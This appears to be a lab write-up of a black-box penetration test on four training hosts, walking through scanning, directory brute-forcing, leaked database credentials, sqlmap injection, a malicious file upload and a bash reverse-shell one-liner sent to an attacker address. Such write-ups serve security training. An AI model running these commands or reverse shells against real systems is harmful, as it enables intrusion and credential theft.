Black Box Test #2

You have been engaged in a Black-box Penetration Test (172.16.64.0/24 range). Your goal is to read the flag file on each machine.

Prework

Connect to VPN

sudo openvpn black-box-penetration-test-2.ovpn

Scan network

sudo nmap -sn 172.16.64.0/24 --exclude 172.16.64.10 -oN hostAlive.nmap &&
cat hostAlive.nmap | grep for | awk {'print $5'} > ips.txt &&
sudo nmap -sV -n -v -Pn -p- -T4 -iL ips.txt -A --open -oX portScan.xml &&
nmap2md.sh portScan.xml | xclip

Scanner

Generated on Mon Jul 12 18:49:14 2021 with nmap 7.91.

nmap -sV -n -v -Pn -p- -T4 -iL ips.txt -A --open -oX portScan.xml

Hosts Alive (4)

Host
OS
Accuracy

172.16.64.81

Linux 3.16

95%

172.16.64.91

Linux 3.13

95%

172.16.64.92

Linux 3.12

95%

172.16.64.166

Linux 3.12

95%

Open Ports and Running Services

✔️172.16.64.81 (Linux 3.16 - 95%)

Port
State
Service
Version

22/tcp

open

ssh

OpenSSH 7.2p2 Ubuntu 4ubuntu2.8

80/tcp

open

http

Apache httpd 2.4.18

13306/tcp

open

mysql

MySQL 5.7.25-0ubuntu0.16.04.2

We found the following hosts in a host.bak file!

While inspecting sabrina's ssh account on ssh://sabrina:CHANGEME@172.16.64.166:222

172.16.64.81	cms.foocorp.io
172.16.64.81  static.foocorp.io
  • File Extension: *

  • File with list of dirs/files: /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt

Dirbuster found the following route with potential credentials!

john1:password123
peter:youdonotguessthatone5

[Web] We get redirected trying to login with john1:password123 and we find the application leaks database credentials in its headers!

HTTP/1.1 302 Found
Date: Thu, 22 Jul 2021 23:05:39 GMT
Server: Apache/2.4.18 (Ubuntu)
X-DB-Key: x41x41x412019!
X-DB-User: root
X-DB-name: mysql
Location: 500.php
Content-Length: 0
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
mysql --host=172.16.64.81 \ 
      --user=root \
      --password=x41x41x412019! \
      --port 13306 mysql

We find user credentials on the cmsbase.tbl_users table:

MySQL [cmsbase]> select user,password,name,email from tbl_users;
+---------+--------------------------------------------------------------+---------+-------------------+
| user    | password                                                     | name    | email             |
+---------+--------------------------------------------------------------+---------+-------------------+
| foocorp | $2a$08$f2fG8Ncpmj815xQ9U3Ylh.uD0VW/X6kOgjPIEHKP547jspS0FlHF6 | foocorp | admin@foocorp.io  |
| mickey  | $2a$08$w/oljwDbODAThUR4HTVO8eUjTabE80sH0i6xnOR97ZXfsGGmxohAW | mickey  | mickey@foocorp.io |
| donald  | $2a$08$dK04y0KEURxDv02vYRab1OMYMSWbW/bpGF.eAWrWv9JAGaa4yTxlq | donald  | donald@foocorp.io |
+---------+--------------------------------------------------------------+---------+-------------------+

Flag encountered! 😁

While inspecting database tables, we find our flag in the cmsbase.flag table.

select * from flag;
+----+------------------------------+
| id | content                      |
+----+------------------------------+
|  1 | Congratulations, you got it! |
+----+------------------------------+
1 row in set (0.141 sec)

✔️172.16.64.91 (Linux 3.13 - 95%)

Port
State
Service
Version

80/tcp

open

http

Apache httpd 2.4.18

6379/tcp

open

redis

Redis key-value store

This machine's domain name is http://75ajvxi36vchsv584es1.foocorp.io/ ****

This route should be added in the local /etc/host.

  • Target URL: http://172.16.64.91

  • File Extension: *

  • File with list of dirs/files: /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt

A route to an app was discovered

Actions:

  • Fix upload form

  • Upload reverse shell

# Save a local file with this updated code for the form
# Notice the form action argument
<html><body style="background: black; color: white;">
<script src="http://75ajvxi36vchsv584es1.foocorp.io/app/js/auth.js"></script>
<center><div style="border: 1px yellow double">
<br /><br />
<form action="http://75ajvxi36vchsv584es1.foocorp.io/app/upload.php" method="post" enctype="multipart/form-data">
<br />Select  file to upload:
<input type="file" name="fileToUpload" id="fileToUpload">
<input type="submit" value="Upload" name="submit">
</form>
<br /><br />
</div></center>
<hr /><br />
<center>&copy; FooCORP 2021</center>
<body></html>

Flag encountered through PHP reverse shell

$ cat flag.txt
Congratulations, you got this!
$ pwd
/var/www/html

✔️172.16.64.92 (Linux 3.12 - 95%)

Port
State
Service
Version

22/tcp

open

ssh

OpenSSH 7.2p2 Ubuntu 4ubuntu2.8

53/tcp

open

domain

dnsmasq 2.75

80/tcp

open

http

Apache httpd 2.4.18

63306/tcp

open

mysql

MySQL 5.7.25-0ubuntu0.16.04.2

  • Target URL: http://172.16.64.92

  • File Extension: *

  • File with list of dirs/files: /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt

Found secret url while inspecting footracking.js

alert("Loaded!");
<!-- pre-login collect data -->
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
	if (this.readyState == 4 && this.status == 200) {
		console.log("OK");
	} else {
		console.log("Error!");
	}

	xhr.open("GET", "http://127.0.0.1/72ab311dcbfaa40ca0739f5daf505494/tracking2.php", true);
	xhr.send("ua=" + navigator.userAgent + "&platform=" + navigator.platform);
}

Having found 72ab311dcbfaa40ca0739f5daf505494/tracking2.php URL leads to think there's another hidden tracking.php (without '2'), where an id url parameter can be passed:

Actions:

  • Try sqlmap

  • Scan new found directory with Gobuster/Dirbuster

sqlmap -u 'http://172.16.64.92/72ab311dcbfaa40ca0739f5daf505494/tracking.php?id=6' --dbs

Found Credentials on MySQL database via sqlmap

| id | adm | password                                  | username  |
+----+-----+-------------------------------------------+-----------+
| 1  | yes | c5d71f305bb017a66c5fa7fd66535b84          | fcadmin1  |
| 2  | yes | 14d69ee186f8d9bbeddd4da31559ce0f          | fcadmin2  |
| 3  | no  | 827ccb0eea8a706c4c34a16891f84e7b (12345)  | tracking1 |
| 4  | no  | e10adc3949ba59abbe56e057f20f883e (123456) | tracking2 |
+----+-----+-------------------------------------------+-----------+

Not enough privileges when login into 72ab311dcbfaa40ca0739f5daf50549/login.php with tracking1/12345

Found credentials in webpage's source code

view-source:http://172.16.64.92/72ab311dcbfaa40ca0739f5daf505494/panel.php

<!-- = '127.0.0.1'; = 'dbuser'; = 'xXxyYyzZz789789)))'; = 'footracking'; = mysqli_connect(, , , );--><br />
dbuser
xXxyYyzZz789789)))
footracking

Actions:

  • Connect to new mysql database

  • Elevate privileges for tracking1 user

mysql --host=172.16.64.92 --user=dbuser --password='xXxyYyzZz789789)))' --port=63306

We now get into a Admin Console panel where we can inject PHP sentences

  • We initiate nc -lvpn 1234 locally

  • We open a reverse shell against our machine while we listen locally on port 1234

exec("/bin/bash -c 'bash -i >& /dev/tcp/172.16.64.10/1234 0>&1'");

We find a long DNS name on /etc/hosts while inspecting through our reverse shell

  • This is the last machine's IP to pwn.

www-data@dns: $ cat /etc/hosts

...
127.0.0.1    0pm6duqbu2o8ajzkjeai.foocorp.io
127.0.0.1    ttpxbpp88fgt9r3292ag.foocorp.io
172.16.64.91    75ajvxi36vchsv584es1.foocorp.io
127.0.0.1    9fys6zpn5k03zt299wyj.foocorp.io
127.0.0.1    uvq8daoyiuq75znffwvy.foocorp.io
127.0.0.1    qv0jwarev2y4lq69xy9w.foocorp.io
127.0.0.1    h1z07t1pujg9ti677md0.foocorp.io
...

Flag encountered

We find the flag while inspecting the remote filesystem through our reverse shell:

www-data@dns:/var/www$ cat flag.txt
cat flag.txt
Congratulations! You got it.

✔️172.16.64.166 (Linux 3.12 - 95%)

Port
State
Service
Version

2222/tcp

open

ssh

OpenSSH 7.2p2 Ubuntu 4ubuntu2.8

8080/tcp

open

http

Apache httpd 2.4.18

[SSH] Warning about password policy

Employees are requested to change their default CHANGEME password.

ssh admin@172.16.64.166 -p 2222                                                                                                             130 ⨯
#################################################################
#       WARNING! This system is for authorized users only.      #
#       You activity is being actively monitored.               #
#       Any suspicious behavior will be resported.              #
#################################################################

~~~~ WORK IN PROGRESS ~~~~
Dear employee! Remember to change the default CHANGEME password ASAP.

admin@172.16.64.166's password: 
  • Target URL: http://172.16.64.166:8080

  • File Extension: *

  • File with list of dirs/files: /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt

[Web] Found commented info for logged in users on the website's markup!

wget http://172.16.64.166:8080/about-us.htm
xmllint --html about-us.htm --xpath '//comment()'

[SSH] We are able to login with sabrina:CHANGEME

Trying 'sabrina'...
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-104-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

195 packages can be updated.
10 updates are security updates.

Last login: Thu Jul 22 22:17:15 2021 from 172.16.64.10
sabrina@xubuntu:~$ 

Found hosts.bak in sabrina's account via ssh:

sabrina@xubuntu:~$ cat ~/hosts.bak 
127.0.0.1	localhost
172.16.64.81	cms.foocorp.io
172.16.64.81    static.foocorp.io

# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

Flag encountered! 😁

sabrina@xubuntu:~$ cat ~/flag.txt 
Congratulations! You have successfully exploited this machine.
Go for the others now.

Last updated